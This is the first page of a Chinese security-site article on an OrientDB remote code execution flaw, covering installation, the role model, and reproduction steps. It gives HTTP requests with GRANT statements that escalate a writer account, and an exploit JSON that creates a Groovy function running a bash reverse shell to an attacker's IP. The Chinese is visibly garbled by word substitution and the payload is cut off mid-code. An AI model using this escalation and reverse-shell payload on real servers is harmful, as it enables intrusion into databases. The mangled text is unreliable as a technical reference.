欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Oreint DB远程代码可执行破绽漏洞bug曝光

来源:本站整理 作者:佚名 时间:2017-09-21 TAG: 我要投稿

0×01 对付orient db数据库
OrientDB是一个开源NoSQL数据库管理系统平台。 NoSQL数据库供给了一种用于存储和检索援用除表式数据以外的数据(比方文档数据或图形数据)的NO干系或非干系数据的机制。 NoSQL数据库越来越多地用于大数据和及时Web应用程式。 NoSQL系统平台偶然也被称为“Not Only SQL”,以夸大它们能够支撑相似SQL的查问说话。

OrientDB也属于NoSQL系列。 OrientDB是第二代分布式数据库,具备机动性的文档在一个产物与Apache 2许可证的凋谢源代码。 在OrientDB以前市场上有几个NoSQL数据库,此中一个是MongoDB。
0×01 orient db 数据库的根基知识
步调1 – 下载OrientDB二进制设置文件
下载地点:http://orientdb.com/download社区版和企业版都能够在任何完成Java虚构机(JVM)的操纵系统平台上运转。 OrientDB必要1.7或更高版本的Java。
步调2 – 解压并装置OrientDB
如下是为分歧操纵系统平台提取和装置OrientDB的进程。在Linux中将orientdb-community-2.1.9.tar.gz文件解压,能够应用如下敕令提取tarred文件。
$ tar –zxvf orientdb-community-2.1.9.tar.gz
应用如下敕令将一切OrientDB库文件从orientdbcommunity-2.1.9挪动到/opt/orientdb/目次。 这里要用sudo
$ sudo mv orientdb-community-2.1.9 /opt/orientdb
应用如下敕令注册orientdb敕令和Orient办事器。
$ export ORIENTDB_HoME = /opt/orientdb$ export PATH = $PATH:$ORIENTDB_HOME/bin
在Windows中将orientdb-community-2.1.9.zip文件解压,将提掏出的文件夹挪动到C:\目次。应用如下给定值创立两个情况变量ORIENTDB_HOME和PATH变量。
ORIENT_HOME = C:orientdb-community-2.1.9
PATH = C:orientdb-community-2.1.9in
步调3 – 设置装备摆设OrientDB办事器作为办事
这里就说下linux的~OrientDB供给了一个名为orientdb.sh的剧本文件,以作为保卫程式运转数据库。在OrientDB装置目次的$ORIENTDB_HOME/bin/orientdb.sh的bin目次中能够找到它。在运转剧本文件以前,编纂orientdb.sh文件以界说两个变量。一个是ORIENTDB_DIR,它界说了装置目次/opt/orientdb的门路,第二个是ORIENTDB_USER,它界说了要运转OrientDB的用户名,如下所示。
ORIENTDB_DIR = "/opt/orientdb"
ORIENTDB_USER = ""
应用如下敕令将orientdb.sh文件复制到/etc/init.d/目次中以初始化和运转剧本。
$ sudo cp $ORIENTDB_HOME/bin/orientdb.sh /etc/init.d/orientdb
应用如下敕令将console.sh文件从OrientDB装置目次$ ORIENTDB_HOME / bin复制到系统平台bin目次(即/ usr / bin)以拜访Orient DB的控制台。
$ sudo cp $ ORIENTDB_HOME/bin/console.sh /usr/bin/orientdb
应用上面的敕令来启动ORIENTDB数据库办事器作为办事。在这里,你必需供给你在orientdb.sh文件说起启动办事器的响应用户的暗码。$ service orientdb start应用如下敕令晓得哪一个PID的OrientDB办事器保卫程式正在运转。$ service orientdb status应用如下敕令结束OrientDB办事器保卫程式。$ service orientdb stop
0×02 漏洞破绽bug阐发
1、OrientDB应用RBAC模子结束认证计划。默许情况下,OrientDB有3个脚色:admin, writer and reader。它们的功效与与用户称号所饰演的脚色雷同。对付在办事器上创立的每一个数据库,默许情况下会分派3个用户。
2、用户的权限分派如下:
admin : 拜访数据库上的一切功效,没有任何限定reader: 只读用户。读者能够查问数据库中的任何记载,但不能改动或删除它,也不能拜访外部信息,比方用户和脚色自己的信息。writer: 与reader雷同,但它也能够创立,更新和删除记载。
3、漏洞破绽bug发生道理
管理员经由过程ORole布局处置用户和他们脚色,OrientDB必要oRole读取权限,以容许用户表现用户权限,并使与oRole权限相联系关系的其余查问。
从版本2.2.x及以上版本,只需oRole被查问,fetchplan和order by语句,则不必要此权限请求,并将信息前往给非特权用户。
因为Orient db启用了这些功效 where、fetchplan、order by,招致了OrientDB具备一个能够履行惯例的功效,而且这个groovy封装器没有沙箱结束掩护招致了系统平台功效被拜访,招致咱们能够运任何敕令。
0×03 漏洞破绽bug复现进程
1、起首先肯定版本号,版本号的肯定可由前往头肯定

2、接着咱们拜访 http://Taarget:2480/listDatabases 获得数据库称号,他会前往为一个json列表

3、用writer的身份测验考试Http根基认证,看其能否对数据库可写。假如可写,那末则漏洞破绽bug存在。
检测三部门的权限能否能获得晋升:1)database.class.ouser
检测能否能够作为特权账户操纵数据库
2)database.function
能否启用功效操纵
3)database.function
能否有系统平台的拜访权限
验证办法如下:
payload:http://Target:2480/command/database_name/sql/-/20?format=rid,type,version,class,graph
以POST的办法哀求如下数据:
GRANT execute ON database.class.ouser TO writer
GRANT execute ON database.function TO writer
GRANT execute ON database.systemclusters TO writer
假如胜利履行则能够应用。
上面给出exp:
{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"' + func_name + '","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/' + reverse_ip + '/6666 0>&1\';File file = new File(\"hello.sh\");file.delete();file    ,"parameters":null}

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载